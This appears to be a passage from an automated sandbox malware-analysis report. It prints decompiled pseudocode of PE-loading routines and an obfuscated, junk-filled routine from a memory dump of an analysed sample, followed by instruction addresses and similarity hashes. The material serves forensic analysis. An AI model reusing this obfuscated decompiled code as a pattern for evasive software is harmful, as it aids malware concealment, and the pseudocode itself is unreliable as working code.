																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0172E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01728F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - L01753C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0172d5f2
0x0172d5f5
0x0172d5f5
0x0172d5fd
0x0172d600
0x0172d60a
0x0172d60d
0x0172d617
0x0172d61d
0x0172d627
0x0172d62e
0x0172d911
0x0172d913
0x00000000
0x0172d919
0x0172d919
0x0172d919
0x0172d634
0x0172d634
0x0172d634
0x0172d634
0x0172d640
0x0172d8bf
0x00000000
0x0172d646
0x0172d646
0x0172d64d
0x0172d652
0x0177b2fc
0x0177b2fc
0x0177b302
0x0177b33b
0x0177b341
0x00000000
0x0177b304
0x0177b304
0x0177b319
0x0177b31e
0x0177b324
0x0177b326
0x0177b332
0x0177b347
0x0177b34c
0x0177b351
0x0177b35a
0x00000000
0x0177b328
0x0177b328
0x00000000
0x0177b328
0x0177b326
0x0172d658
0x0172d658
0x0172d65b
0x0172d665
0x00000000
0x0172d66b
0x0172d66b
0x0172d66b
0x0172d66b
0x0172d66d
0x0172d672
0x0172d67a
0x00000000
0x00000000
0x0172d680
0x0172d686
0x0172d8ce
0x0172d8d4
0x0172d8dd
0x0172d8e0
0x0172d68c
0x0172d691
0x0172d69d
0x0172d6a2
0x0172d6a7
0x0172d6b0
0x0172d6b5
0x0172d6e0
0x0172d6b7
0x0172d6b7
0x0172d6b9
0x0172d6b9
0x0172d6bb
0x0172d6bd
0x0172d6ce
0x0172d6d0
0x0172d6d2
0x0177b363
0x0177b365
0x00000000
0x0177b36b
0x00000000
0x0177b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0172d6bf
0x0172d6bf
0x0172d6e5
0x0172d6e7
0x0172d6e9
0x0172d6ec
0x0172d6ec
0x0172d6ef
0x0172d6f5
0x0172d6f9
0x0172d6fb
0x0172d6fd
0x0172d701
0x0172d703
0x0172d70a
0x0172d70a
0x0172d701
0x0172d710
0x0172d710
0x0172d6c1
0x0172d6c1
0x0172d6c6
0x0177b36d
0x0177b36f
0x00000000
0x0177b375
0x0177b375
0x0177b375
0x00000000
0x0177b375
0x00000000
0x0172d6cc
0x0172d6d8
0x0172d6d8
0x0172d6d8
0x00000000
0x0172d6c6
0x0172d6bf
0x00000000
0x0172d6da
0x0172d6da
0x0172d716
0x0172d71b
0x0172d720
0x0172d726
0x0172d726
0x0172d72d
0x00000000
0x0172d733
0x0172d739
0x0172d742
0x0172d750
0x0172d758
0x0172d764
0x0172d776
0x0172d77a
0x0172d783
0x0172d928
0x0172d92c
0x0172d93d
0x0172d944
0x0172d94f
0x0172d954
0x0172d956
0x0172d95f
0x0172d961
0x0172d973
0x0172d973
0x0172d956
0x0172d944
0x0172d92c
0x0172d78b
0x0177b394
0x0172d791
0x0172d798
0x0177b3a3
0x0177b3bb
0x0177b3bb
0x0172d7a5
0x0172d866
0x0172d870
0x0172d892
0x0172d898
0x0172d89e
0x0172d8a0
0x0172d8a6
0x0172d8ac
0x0172d8ae
0x0172d8b4
0x0172d8b4
0x0172d8ae
0x0172d7a5
0x0172d78b
0x0172d7b1
0x0177b3c5
0x0177b3c5
0x0172d7c3
0x0172d7ca
0x0172d7e5
0x0172d7eb
0x0172d8eb
0x0172d8ed
0x00000000
0x0172d8f3
0x0172d8f3
0x0172d8f3
0x00000000
0x0172d8ed
0x0172d7cc
0x0172d7cc
0x0172d7d2
0x00000000
0x0172d7d4
0x0172d7d4
0x0172d7d7
0x0172d7df
0x0177b3d4
0x0177b3d9
0x0177b3dc
0x0177b3dc
0x0177b3df
0x0177b3e2
0x0177b468
0x0177b46d
0x0177b46f
0x0177b46f
0x0177b475
0x0172d8f8
0x0172d8f9
0x0172d8fd
0x0177b3e8
0x0177b3e8
0x0177b3eb
0x0177b3ed
0x00000000
0x0177b3ef
0x0177b3ef
0x0177b3f1
0x0177b3f4
0x0177b3fe
0x0177b404
0x0177b409
0x0177b40e
0x0177b410
0x0177b410
0x0177b414
0x0177b414
0x0177b41b
0x0177b420
0x0177b423
0x0177b425
0x0177b427
0x0177b42a
0x0177b42d
0x0177b42d
0x0177b42a
0x0177b432
0x0177b436
0x0177b438
0x0177b43b
0x0177b43b
0x0177b449
0x0177b44e
0x0177b454
0x0177b458
0x0177b458
0x0177b45d
0x00000000
0x0177b45d
0x0177b3ed
0x00000000
0x00000000
0x00000000
0x0172d7df
0x0172d7d2
0x0172d7ca
0x0177b37c
0x0177b37e
0x0177b385
0x0177b38a
0x00000000
0x0177b38a
0x0172d742
0x0172d7f1
0x0172d7f8
0x0177b49b
0x0177b49b
0x0172d800
0x0172d837
0x0172d843
0x0172d845
0x0172d847
0x0172d84a
0x0172d84b
0x0172d84e
0x0172d857
0x0172d818
0x0172d824
0x0172d831
0x0177b4a5
0x0177b4ab
0x0177b4b3
0x0177b4b8
0x0177b4bb
0x00000000
0x0177b4c1
0x0177b4c1
0x0177b4c8
0x00000000
0x0177b4ce
0x0177b4d4
0x0177b4e1
0x0177b4e3
0x0177b4e5
0x00000000
0x0177b4eb
0x0177b4f0
0x0177b4f2
0x0172dac9
0x0172dacc
0x0172dacf
0x0172dad1
0x0172dd78
0x0172dd78
0x0172dcf2
0x00000000
0x0172dad7
0x0172dad9
0x0172dadb
0x00000000
0x00000000
0x0172dae1
0x0172dae1
0x0172dae4
0x0172dae6
0x0177b4f9
0x0177b4f9
0x0177b500
0x0172daec
0x0172daec
0x0172daf5
0x0172daf8
0x0172dafb
0x0172db03
0x0172db11
0x0172db16
0x0172db19
0x0172db1b
0x0177b52c
0x0177b531
0x0177b534
0x0172db21
0x0172db21
0x0172db24
0x0172dcd9
0x0172dce2
0x0172dce5
0x0172dd6a
0x0172dd6d
0x00000000
0x0172dd73
0x0177b51a
0x0177b51c
0x0177b51f
0x0177b524
0x00000000
0x0177b524
0x0172dce7
0x0172dce7
0x0172dce7
0x00000000
0x0172dce7
0x00000000
0x0172db2a
0x0172db2c
0x0172db31
0x0172db33
0x0172db36
0x0172db39
0x0172db3b
0x0172db66
0x0172db66
0x0172db3d
0x0172db3d
0x0172db3e
0x0172db46
0x0172db47
0x0172db49
0x0172db4c
0x0172db53
0x0172db55
0x0172db58
0x0172db5a
0x0177b50a
0x0177b50f
0x0177b512
0x0172db60
0x0172db60
0x0172db63
0x0172db63
0x00000000
0x0172db63
0x0172db5a
0x0172db3b
0x0172db24
0x0172db69
0x0172db69
0x0172db6c
0x0172db6f
0x0172db74
0x0177b557
0x0177b557
0x0177b55e
0x0172db7a
0x0172db7c
0x0172db7f
0x0172db82
0x0172db85
0x00000000
0x0172db8b
0x0172db8b
0x0172db8d
0x0172db9b
0x0172db9b
0x0172db9d
0x0172dba0
0x0172dba2
0x0172dba4
0x0172dba7
0x0172dba9
0x0172dbae
0x0172dbae
0x0172dbb1
0x0172dbb4
0x0172dbb4
0x0172dbb7
0x0172dbba
0x0172dcd2
0x0172dcd4
0x00000000
0x0172dbc0
0x0172dbc0
0x0172dbd2
0x0172dbd7
0x0172dbda
0x0172dbdd
0x0172dbdf
0x00000000
0x0172dbe5
0x0172dbe5
0x0172dbee
0x0172dbf1
0x0177b541
0x0177b544
0x00000000
0x0177b546
0x0177b546
0x00000000
0x0177b546
0x0172dbf7
0x0172dbf7
0x0172dbfd
0x0172dbfd
0x0172dbff
0x0172dc0b
0x0172dc15
0x0172dc1b
0x0172dc1d
0x0172dc21
0x0172dc21
0x0172dc23
0x0172dc23
0x0172dc26
0x0172dc29
0x0172dc2b
0x00000000
0x00000000
0x0172dc31
0x0172dc34
0x0172dc36
0x0172dcbf
0x0172dcbf
0x0172dcc2
0x00000000
0x0172dc3c
0x0172dc41
0x0172dc43
0x00000000
0x0172dc45
0x0172dc45
0x0172dc47
0x00000000
0x0172dc4d
0x0172dc4d
0x0172dc50
0x0172dc52
0x0172dc55
0x0172dcfa
0x0172dcfe
0x0172dd08
0x0172dd0a
0x0172dd0c
0x00000000
0x0172dd12
0x0172dd15
0x0172dd2d
0x0172dd2f
0x0172dd32
0x0172dd35
0x00000000
0x0172dd35
0x0172dc5b
0x0172dc5b
0x0172dc5e
0x0172dc61
0x0172dc64
0x0172dc67
0x0172dc67
0x0172dc6a
0x0172dc6c
0x0172dc8e
0x0172dc8e
0x0172dc91
0x0172dc93
0x0172dcce
0x0172dcce
0x0172dc95
0x0172dc9c
0x0172dc6e
0x0172dc72
0x0172dc75
0x0172dc77
0x0172dc79
0x0177b551
0x0177b551
0x00000000
0x0172dc7f
0x0172dc7f
0x0172dc81
0x00000000
0x0172dc83
0x0172dc86
0x0172dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0172dc88
0x0172dc81
0x0172dc79
0x0172dc6c
0x0172dc55
0x0172dc47
0x0172dc43
0x00000000
0x0172dc36
0x0172dc23
0x00000000
0x0172dbff
0x0172dbf1
0x0172dbdf
0x0172db8f
0x0172db92
0x0172db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0172db95
0x0172db8d
0x0172db85
0x0172db74
0x0172dc9f
0x0172dca2
0x0172dcb0
0x0172dcb0
0x0172dad1
0x0177b4e5
0x0177b4c8
0x00000000
0x00000000
0x00000000
0x0172d831
0x00000000
0x0172d800
0x0177b47f
0x0177b485
0x00000000
0x0177b485
0x0172d665
0x0172d652
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f863c49830eea701379bdbc07417852c93f88e47be77196a92e6da74f6cb5d
Instruction ID: df50a2c6ae94afca95b5bb501305773358884c0e5d6c9d8a5bd886c02ec01b64
Opcode Fuzzy Hash: 87f863c49830eea701379bdbc07417852c93f88e47be77196a92e6da74f6cb5d
Instruction Fuzzy Hash: 8BE1BE30A0176A8FEB35CF68C894BA9FBB2BF45304F0501E9D90997395D774AA82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A9ED31 Relevance: .3, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00A9ED31() {
				void* _t23;
				intOrPtr _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;
				signed char _t32;
				signed char _t35;
				signed char _t37;
				signed char _t40;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t46;
				signed int _t51;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t61;
				intOrPtr _t66;

				asm("rcr dword [0x4c03d425], 0x8e");
				 *0xb1c69c27 =  *0xb1c69c27 ^ _t40;
				 *0x46848430 =  *0x46848430 - _t23;
				_t30 = _t28 ^ 0x49b42ae9 ^  *0xc0a815cd;
				_t54 = _t52 + 0x00000001 ^ 0xa026b22b;
				 *0xa0f0968a =  *0xa0f0968a << 0x11;
				 *0xaaf79533 =  *0xaaf79533 - _t54;
				asm("cmpsw");
				if((_t40 ^  *0x9ced7230) <= 0) {
					__ebx =  *0xd14eb17f * 0x5453;
					asm("sbb dl, 0x88");
					__ch = __ch ^ 0x000000b5;
					__eax = __eax |  *0xe00530e;
					asm("adc [0xa0a109bb], edx");
					__eax = __eax + 0xce6a1719;
					__eflags =  *0xc629891c - __bl;
					asm("ror dword [0x1bf9ebf], 0x6");
					__esi =  *0x86a858e;
					 *0x4b23bfdc =  *0x4b23bfdc << 0xe1;
					 *0xa646121a =  *0xa646121a ^ __dl;
					asm("rcl dword [0x57f54ca9], 0xfb");
					 *0xe052b496 =  *0xe052b496 << 0xd0;
					asm("scasd");
					__edi = __edi &  *0x21558dcc;
					__edx =  *0xba81f36a * 0xbff9;
					 *0x98cb488d = 0x5f162dfd;
					__esi =  *0x86a858e &  *0x14491b1e;
					 *0x453e31bb =  *0x453e31bb | __edi;
					__ebp = __ebp | 0x0af82c37;
					 *0x46a2f9 =  *0x46a2f9 ^ __bh;
					__esp = __esp ^  *0x59039fdd;
					__dl = __dl |  *0x132bd886;
					__esi = ( *0x86a858e &  *0x14491b1e) - 1;
					asm("adc esp, [0x9a396dd6]");
					L1();
					 *0xae0b41e8 =  *0xae0b41e8 >> 0x86;
					__ah = __ah &  *0xe822d938;
					__edi = __edi ^  *0x811a781d;
					asm("sbb [0x2987f91f], ebx");
					__eflags =  *0x19c0220c - __al;
					 *0xf724e1ef =  *0xf724e1ef << 0xba;
					_push( *0x2adeea97);
					__eflags =  *0xbea64ac4 & __esi;
					__esp = __esp - 1;
					__ebp = __ebp |  *0xaf2c50bc;
					__bl = __bl + 0x18;
					__ebx =  *0xd14eb17f * 0x00005453 |  *0x73e8cbff;
					asm("sbb [0xf8b7a997], esi");
					__eax = __eax +  *0x2857556d;
					__eflags = __esp -  *0x4759429f;
					 *0x86555e83 =  *0x86555e83 - __esi;
					__ecx - 0x4389f337 =  *0xdb803d6f & __esi;
					asm("ror byte [0x2ee43524], 0xc7");
					 *0xcba3c6e1 =  *0xcba3c6e1 << 0xc9;
					 *0x49c6eeb3 & __dh =  *0xbbb36323 - ( *0xd14eb17f * 0x00005453 |  *0x73e8cbff);
					 *0xba81f36a * 0xbff9 - 1 =  *0xba81f36a * 0xbff9 - 1 +  *0x9be0d562;
					__esi = __ecx;
					 *0x5fba2c6f =  *0x5fba2c6f << 0x55;
					__edx =  *0xa05b0711;
					__ebp = __ebp & 0x51e0672d;
					__eax = __eax + 1;
					__esp = __esp - 1;
					__ah = __ah &  *0xd7c00388;
					__eflags = __ah;
					if(__ah > 0) {
						__ebp =  *0xd8fd127e * 0x98a5;
						asm("movsw");
						__ecx =  *0xe51bb16a * 0xd13a;
						__ebx =  *0xd082b76b * 0xdec4;
						__edx =  *0x49f524d4;
						__eflags = __ebp & 0x5937c691;
						__eax = __eax - 1;
						 *0x3ca1e1ff =  *0x3ca1e1ff + __eax;
						 *0xba8f20a2 =  *0xba8f20a2 >> 0xf6;
						 *0xcc89d01b =  *0xcc89d01b << 0x4b;
						asm("sbb ch, [0xea1c7388]");
						__eflags = __edx - 0xfe27f389;
						 *0xf5eab60c =  *0xf5eab60c >> 0xcc;
						__edx = __edx &  *0xb0b6a23f;
						asm("adc ecx, [0x49d1719f]");
						__ebp = __ebp &  *0x897216dc;
						__eflags = __ebp;
						if(__ebp >= 0) {
							_t17 = __ecx;
							__ecx =  *0xe05dd370;
							 *0xe05dd370 = _t17;
							__eax = __eax - 1;
							asm("rcr dword [0x88413966], 0x1b");
							 *0xf1940286 =  *0xf1940286 & __ch;
							 *0x3d123137 =  *0x3d123137 + __esp;
							 *0x220a7262 = __edx;
							__esp =  *0xdaf2be83;
							__ecx =  *0xe05dd370 ^  *0xa5640685;
							asm("adc [0xfb5c4e33], edx");
							asm("adc [0xfc3f36b9], ebx");
							 *0xb31e16e =  *0xb31e16e - __edx;
							__eax = __eax | 0xf9501b89;
							__edi = __edi - 0x10906165;
							__ah =  *0x88542d02;
							__esp =  *0xdaf2be83 ^ 0xa68239fa;
							 *0x5a70a88e =  *0x5a70a88e | __esp;
							__edx = __edx + 1;
							__bl = __bl |  *0x27c5338;
							__edi = __edi - 0x59d6ae29;
							asm("sbb esp, [0xaa8d3e94]");
							 *0x64fa3c4 = __ebx;
							asm("movsw");
							 *0x9654b3da =  *0x9654b3da << 0x5e;
							__eax = __eax +  *0xcce07009;
							 *0x73b7e8c6 =  *0x73b7e8c6 >> 0xb;
							__eflags =  *0xf4912bbf & __ebp;
							 *0xf75c8acd =  *0xf75c8acd & __eax;
							asm("adc [0x5d427b1e], esi");
							__al = __al ^  *0x1138c5e1;
							asm("ror dword [0x71427fd1], 0x3c");
							__ebp = 0x2d276407;
							asm("adc ebp, [0x60e6f46d]");
							__ebx =  *0xa170fc69 * 0x66f4;
							__ecx =  *0xe05dd370 ^  *0xa5640685 |  *0xffb6c60d;
							__edi = __eax;
							__esp =  *0xef5784c1;
							__eflags = __ecx -  *0xea4cfb93;
							__eflags =  *0x11ed7c20 & __cl;
							asm("rol dword [0x9e17a28e], 0xec");
							_pop(ss);
							asm("sahf");
							asm("in al, dx");
							if(__eflags < 0) {
								 *0x742f6373 =  *0x742f6373 ^ __eax;
								__esp = __esp ^  *0xc09852a9;
								__eflags = __esp;
								if(__esp == 0) {
									__edx = __edx | 0x2f66d27b;
									asm("cmpsw");
									asm("sbb [0xea869c65], esp");
									asm("rcr dword [0xeed9d0fc], 0x8d");
									asm("scasb");
									_push(__ecx);
									asm("rcl dword [0x39b5c33f], 0xea");
									__ecx = __ecx &  *0x86d2692;
									__bh = __bh | 0x000000a0;
									asm("adc eax, 0x8c31df8f");
									__cl = __cl +  *0x91607918;
									__eflags = 0x2d276407 - 0x7899f331;
									 *0x5ab5c3e6 =  *0x5ab5c3e6 >> 0x93;
									asm("rcl byte [0xf5b4efb1], 0x8c");
									 *0x8dd1432e =  *0x8dd1432e >> 0xfd;
									__eflags =  *0x8dd1432e;
									asm("adc bh, 0x30");
									if( *0x8dd1432e >= 0) {
										asm("ror dword [0x1a5f3578], 0x6");
										__ebp = 0x2d276408;
										__cl = __cl &  *0xaa96bc20;
										__eflags = __esp -  *0x5e0ceef7;
										asm("sbb bh, [0x3ccaad86]");
										 *0x65f5ef92 =  *0x65f5ef92 >> 0xc1;
										__edx = __edx ^  *0xc39da5f3;
										_push(__eax);
										 *0xe181b9d3 =  *0xe181b9d3 >> 0x2c;
										__esi =  *0x2b15a86a * 0x1fb7;
										__ebx = __ebx ^  *0xa1dbe9c;
										__ebx = __ebx - 1;
										__eflags = __bh & 0x0000001c;
										_push( *0x5f1b2867);
										if(__eflags == 0) {
											 *0xde6b6775 =  *0xde6b6775 >> 0xc2;
											if(__eflags < 0) {
												__eflags = __ebx -  *0xb29e7771;
												if(__ebx >=  *0xb29e7771) {
													__eax =  *0xb97597c * 0x16f1;
													__edi = __edi - 0xeb9fcfc;
													__ebx = __ebx - 0x8fc792fe;
													 *0x917bfd2 =  *0x917bfd2 >> 0x76;
													__eflags =  *0x917bfd2;
													if( *0x917bfd2 >= 0) {
														__ecx = __ecx +  *0x8e8f8478;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_t30 = _t30 +  *0xae3748ca;
				_t43 =  *0xf28ea5e2;
				 *0xf28ea5e2 =  *0x90760ce5;
				_t32 = (_t32 & 0x00000034 |  *0xaa96a0e) &  *0x560b30f4;
				if(_t32 > 0) {
					asm("adc ah, 0x8a");
					asm("adc dh, 0x82");
					asm("adc eax, 0x64378c29");
					_t35 = _t32 &  *0x7663bc3f;
					asm("sbb [0xd5ec522c], al");
					_push( *0x544ac0e);
					 *0x13b01a6d =  *0x13b01a6d ^ _t35;
					 *0x71978982 =  *0x71978982 - _t43;
					asm("sbb [0x74e09d3b], ecx");
					_t32 = _t35 ^ 0x0000001a;
					_t30 = _t30 & 0x0c010076 &  *0x6214a791;
					_t44 = _t43 + 1;
					_t61 = _t44;
					if(_t61 != 0) {
						_t26 =  *0xf5d59e74;
						asm("lodsb");
						_push(_t51);
						if(_t61 < 0) {
							 *0x892ff771 =  *0x892ff771 | _t55;
							 *0x2f1d94b9 =  *0x2f1d94b9 | _t51;
							_t32 = _t32 & 0x1a738deb;
							asm("rcl dword [0xd23ede89], 0xe9");
							_t27 = _t26 + 0xaf6e0b0f;
							_t46 = (_t44 |  *0x48708039) - 1;
							 *0xdab24fd5 = _t55;
							if(_t46 >= 0) {
								 *0xc6a36572 =  *0xc6a36572 << 0x66;
								_push( *0xd95274a3);
								_push( *0xe5d84afb);
								 *0xcdf8b2d3 = _t32;
								 *0x7edf7cb8 =  *0x7edf7cb8 + _t56;
								asm("rcr dword [0x457feedb], 0x5c");
								 *0xa1780add = _t46;
								asm("adc edi, 0x1894d2bf");
								_t32 =  *0xcdf8b2d3 |  *0xf30877d2;
								asm("sbb [0xe8d3a89a], ecx");
								 *0xa91b81e1 =  *0xa91b81e1 + ( *0xa1780add -  *0xc44023e7 & 0xb1f4773b);
								_t66 =  *0xa91b81e1;
								_t30 =  *0x1ca482e5;
								if(_t66 > 0) {
									_t55 =  *0xcd5b6476;
									if(_t66 < 0) {
										_push( *0x2f1cd873);
										 *0x1f629199 =  *0x1f629199 << 0x6c;
										_pop(_t37);
										_t54 = _t54 - 1;
										 *0x9a6fb4fc =  *0x9a6fb4fc | _t27;
										_push( *0x781951c5);
										asm("adc edi, 0xe674c319");
										_push( *0xc5d44060 * 0xced);
										_t51 = _t51 |  *0x8a3c711b;
										asm("adc [0x1e0c1527], esi");
										asm("sbb edx, 0x4b544a6c");
										asm("adc [0xbcb4bda8], ch");
										asm("adc esi, 0x8656dfd8");
										_t32 =  *0x1866f9fd;
										 *0x1866f9fd = (_t37 & 0x00000032) -  *0xb8cee96c;
										_t56 = _t56 +  *0xb5ec9c66;
										 *0xcd9412c6 = _t27;
										if(_t56 >= 0) {
											_t54 =  *0xd383e07c * 0x4a6b;
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x00a9ed38
0x00a9ed3f
0x00a9ed45
0x00a9ed4b
0x00a9ed51
0x00a9ed58
0x00a9ed5f
0x00a9ed65
0x00a9ed6d
0x00a9ed73
0x00a9ed7d
0x00a9ed85
0x00a9ed88
0x00a9ed8e
0x00a9ed94
0x00a9ed99
0x00a9ed9f
0x00a9eda6
0x00a9edac
0x00a9edb3
0x00a9edb9
0x00a9edc0
0x00a9edc7
0x00a9edc8
0x00a9edce
0x00a9edd8
0x00a9edde
0x00a9ede4
0x00a9edea
0x00a9edf0
0x00a9edf6
0x00a9edfc
0x00a9ee02
0x00a9ee03
0x00a9ee09
0x00a9ee0e
0x00a9ee15
0x00a9ee1b
0x00a9ee21
0x00a9ee27
0x00a9ee2d
0x00a9ee34
0x00a9ee3a
0x00a9ee40
0x00a9ee42
0x00a9ee48
0x00a9ee4b
0x00a9ee51
0x00a9ee57
0x00a9ee5d
0x00a9ee63
0x00a9ee6f
0x00a9ee75
0x00a9ee7c
0x00a9ee89
0x00a9ee90
0x00a9ee96
0x00a9ee97
0x00a9ee9e
0x00a9eea4
0x00a9eeaa
0x00a9eeab
0x00a9eeac
0x00a9eeac
0x00a9eeb2
0x00a9eeb8
0x00a9eec2
0x00a9eec4
0x00a9eece
0x00a9eed8
0x00a9eede
0x00a9eee4
0x00a9eee5
0x00a9eeeb
0x00a9eef2
0x00a9eef9
0x00a9eeff
0x00a9ef05
0x00a9ef0c
0x00a9ef12
0x00a9ef18
0x00a9ef18
0x00a9ef1e
0x00a9ef24
0x00a9ef24
0x00a9ef24
0x00a9ef2a
0x00a9ef2b
0x00a9ef32
0x00a9ef38
0x00a9ef3e
0x00a9ef44
0x00a9ef4a
0x00a9ef50
0x00a9ef56
0x00a9ef5c
0x00a9ef62
0x00a9ef67
0x00a9ef6d
0x00a9ef73
0x00a9ef79
0x00a9ef7f
0x00a9ef80
0x00a9ef86
0x00a9ef8c
0x00a9ef92
0x00a9ef99
0x00a9ef9b
0x00a9efa2
0x00a9efa8
0x00a9efaf
0x00a9efb5
0x00a9efbb
0x00a9efc1
0x00a9efc7
0x00a9efce
0x00a9efd3
0x00a9efd9
0x00a9efe3
0x00a9efe9
0x00a9efea
0x00a9eff0
0x00a9eff6
0x00a9effc
0x00a9f000
0x00a9f001
0x00a9f002
0x00a9f003
0x00a9f009
0x00a9f00f
0x00a9f00f
0x00a9f015
0x00a9f01b
0x00a9f021
0x00a9f023
0x00a9f029
0x00a9f030
0x00a9f031
0x00a9f032
0x00a9f039
0x00a9f03f
0x00a9f042
0x00a9f047
0x00a9f04d
0x00a9f053
0x00a9f05b
0x00a9f062
0x00a9f062
0x00a9f069
0x00a9f06c
0x00a9f072
0x00a9f079
0x00a9f07a
0x00a9f080
0x00a9f086
0x00a9f08c
0x00a9f094
0x00a9f09a
0x00a9f09b
0x00a9f0a2
0x00a9f0ac
0x00a9f0b2
0x00a9f0b3
0x00a9f0b6
0x00a9f0bc
0x00a9f0c2
0x00a9f0c9
0x00a9f0cf
0x00a9f0d5
0x00a9f0db
0x00a9f0e5
0x00a9f0eb
0x00a9f0f1
0x00a9f0f1
0x00a9f0f8
0x00a9f0fe
0x00a9f0fe
0x00a9f0f8
0x00a9f0d5
0x00a9f0c9
0x00a9f0bc
0x00a9f06c
0x00a9f015
0x00a9f003
0x00a9ef1e
0x00a9eeb2
0x00a9eb90
0x00a9eb96
0x00a9eb9f
0x00a9eb9f
0x00a9ebab
0x00a9ebb1
0x00a9ebb9
0x00a9ebc2
0x00a9ebc5
0x00a9ebcc
0x00a9ebd2
0x00a9ebde
0x00a9ebe4
0x00a9ebea
0x00a9ebf0
0x00a9ebf6
0x00a9ebf9
0x00a9ebff
0x00a9ebff
0x00a9ec00
0x00a9ec02
0x00a9ec07
0x00a9ec08
0x00a9ec09
0x00a9ec0b
0x00a9ec17
0x00a9ec1d
0x00a9ec2f
0x00a9ec36
0x00a9ec3b
0x00a9ec3c
0x00a9ec43
0x00a9ec49
0x00a9ec50
0x00a9ec56
0x00a9ec5c
0x00a9ec62
0x00a9ec6e
0x00a9ec75
0x00a9ec7b
0x00a9ec8d
0x00a9ec93
0x00a9ec99
0x00a9ec99
0x00a9ec9f
0x00a9eca5
0x00a9ecab
0x00a9ecb1
0x00a9ecb7
0x00a9ecbd
0x00a9ecc4
0x00a9ecce
0x00a9eccf
0x00a9ecd5
0x00a9ecdb
0x00a9eceb
0x00a9ecec
0x00a9ecf2
0x00a9ecf8
0x00a9ecfe
0x00a9ed04
0x00a9ed0a
0x00a9ed0a
0x00a9ed10
0x00a9ed16
0x00a9ed1c
0x00a9ed22
0x00a9ed22
0x00a9ed1c
0x00a9ecb1
0x00a9eca5
0x00a9ec43
